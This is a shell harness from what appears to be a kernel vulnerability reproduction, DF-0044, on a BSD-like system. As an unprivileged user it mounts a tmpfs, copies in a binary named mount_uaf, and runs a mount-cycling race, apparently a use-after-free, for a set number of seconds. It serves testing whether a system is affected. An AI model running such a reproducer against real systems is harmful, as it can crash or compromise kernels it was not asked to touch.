DF-0044 / run.sh
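#!/bin/sh
# DF-0044 run -- set up the cycled mount, host the binary inside it,
# and hammer the race as the unprivileged user.
#
# Pre-conditions on the guest (run as root once before this script):
#   sysctl vfs.usermount=1
#   mkdir -p /tmp/df0044/m
#   chown <user>:<user> /tmp/df0044/m
#   chmod 0755 /tmp/df0044/m
#
# Then as the unprivileged user:
#   ./build.sh && ./run.sh [SECS]
#
# Arguments:
#   SECS  run time in seconds handed to mount_uaf (default 60); digits only.
#
# Exit status:
#   2 if SECS is not a number, otherwise the exit status of mount_uaf.
#
# State left behind: this script never unmounts $MP and never removes $BASE.
# After the run, unmount $MP and restore vfs.usermount to its previous value,
# since the sysctl is what lets an unprivileged user mount at all.

set -e

cd -- "$(dirname -- "$0")"

SECS="${1:-60}"
BASE=/tmp/df0044
MP=$BASE/m

# Reject a non-numeric duration here instead of passing it to the binary.
case "$SECS" in
  '' | *[!0-9]*)
    printf 'usage: %s [SECS]\n' "$0" >&2
    exit 2
    ;;
esac

mkdir -p "$MP"
# Best effort: fails harmlessly when the directory is not owned by this user.
chmod 0755 "$MP" 2>/dev/null || true

# Initial tmpfs to host the binary. The cycler will overmount+unmount this
# path; the binary's text vp stays mapped on this initial mount, and
# /proc/self/map walks its path across the cycled mountpoint.
#
# The mount stays best effort as in the original, but a failure is now
# reported: without it the binary is copied onto whatever already backs $MP,
# and a clean run then says little about whether the guest is affected.
if ! mount -t tmpfs dummy "$MP" 2>/dev/null; then
  printf 'DF-0044: warning: tmpfs mount on %s failed; check the pre-conditions\n' \
    "$MP" >&2
fi
chmod 0755 "$MP"

cp -f mount_uaf "$MP/mount_uaf"
chmod 755 "$MP/mount_uaf"
cd "$MP"

echo "DF-0044: starting race for ${SECS}s ..."

# Capture the status through `||`: under `set -e` a bare failing command
# would end the script before RC=$? and the rc line below ever ran.
# The trailing 2 is passed through unchanged; its meaning is defined by
# mount_uaf, which is not shown here.
RC=0
./mount_uaf "$MP" "$SECS" 2 || RC=$?

echo "DF-0044: rc=$RC"
exit "$RC"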